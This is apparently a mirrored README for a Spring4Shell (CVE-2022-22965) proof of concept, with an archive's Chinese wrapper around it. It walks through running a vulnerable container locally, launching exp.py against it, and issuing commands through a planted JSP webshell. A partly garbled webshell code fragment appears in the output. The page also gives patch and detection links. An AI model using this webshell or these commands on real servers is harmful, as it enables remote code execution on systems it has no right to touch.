关联漏洞
标题:
Spring Framework 代码注入漏洞
(CVE-2022-22965)
描述:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞,该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响:5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。
描述
Spring4Shell - Spring Core RCE - CVE-2022-22965
介绍
# Spring Core RCE - CVE-2022-22965
> After Spring Cloud, on March 29, another heavyweight vulnerability of Spring broke out on the Internet: Spring Core RCE
>
> On March 31 Spring released new versions which fixes the vulnerability. See section [Patching](#patching).
>
> On March 31 a [CVE-number was finally assigned to the vulnerability](https://tanzu.vmware.com/security/cve-2022-22965) with a [CVSS score 9.8 (CRITICAL)](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
## Proof-of-Concept
The exploit is very easy to use, hence the very high CVSS score of 9.8.
To test the vulnerability you can do the following.
Start a vulnerable docker image of Spring.
```sh
docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29
```
This binds the vulnerable Spring to the address `localhost:8082`.
Verify the image is started correctly with `curl`
```sh
curl http://localhost:8082
```
A response of `ok` should be returned.
Let's exploit the vulnerable image now!
```sh
python3 exp.py --url http://localhost:8082
```
A response of `The vulnerability exists ....` should be returned.
You can now exploit the vulnerability with `curl`
```sh
# Execute command whoami
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami
# Response has been truncated
root
//
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } - ........
# Execute command ls
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls
# Response has been truncated
app
bin
dev
etc
..........
```
## Circulating coding poc
**The exploit has been uploaded so far ```exp.py```**
## Patching
Spring have now released new versions which addresses this CVE. See [Springs announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement).
[The commit that patched the vulnerability](https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529)
## Vulnerability Impact
1. JDK version 9 and above
2. Spring Framework or derived frameworks are used
## Bug fix suggestion
At present, Spring has not officially released a patch, it is recommended to reduce the jdk version as a temporary solution
## Blue team
### Yara
* [Florian Roth - Spring4Shell webshells](https://github.com/Neo23x0/signature-base/blob/master/yara/expl_spring4shell.yar)
### Sigma
* [Emanuele De Lucia - Creation of .jsp webshells](https://github.com/edelucia/rules/blob/main/sigma/Spring4Shell.yaml)
### SPLUNK
* [Alex John - Splunk detection SPL](https://github.com/west-wind/Spring4Shell-Detection)
文件快照
[4.0K] /data/pocs/bd27feb640e19e3c009755824556323229861b10
├── [2.0K] exp.py
├── [4.0K] images
│ ├── [382K] img_1.png
│ └── [224K] poc.png
├── [2.8K] README.md
├── [2.2M] Vulnerability Analysis [CHINESE].pdf
└── [2.3M] Vulnerability Analysis [ENGLISH].pdf
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。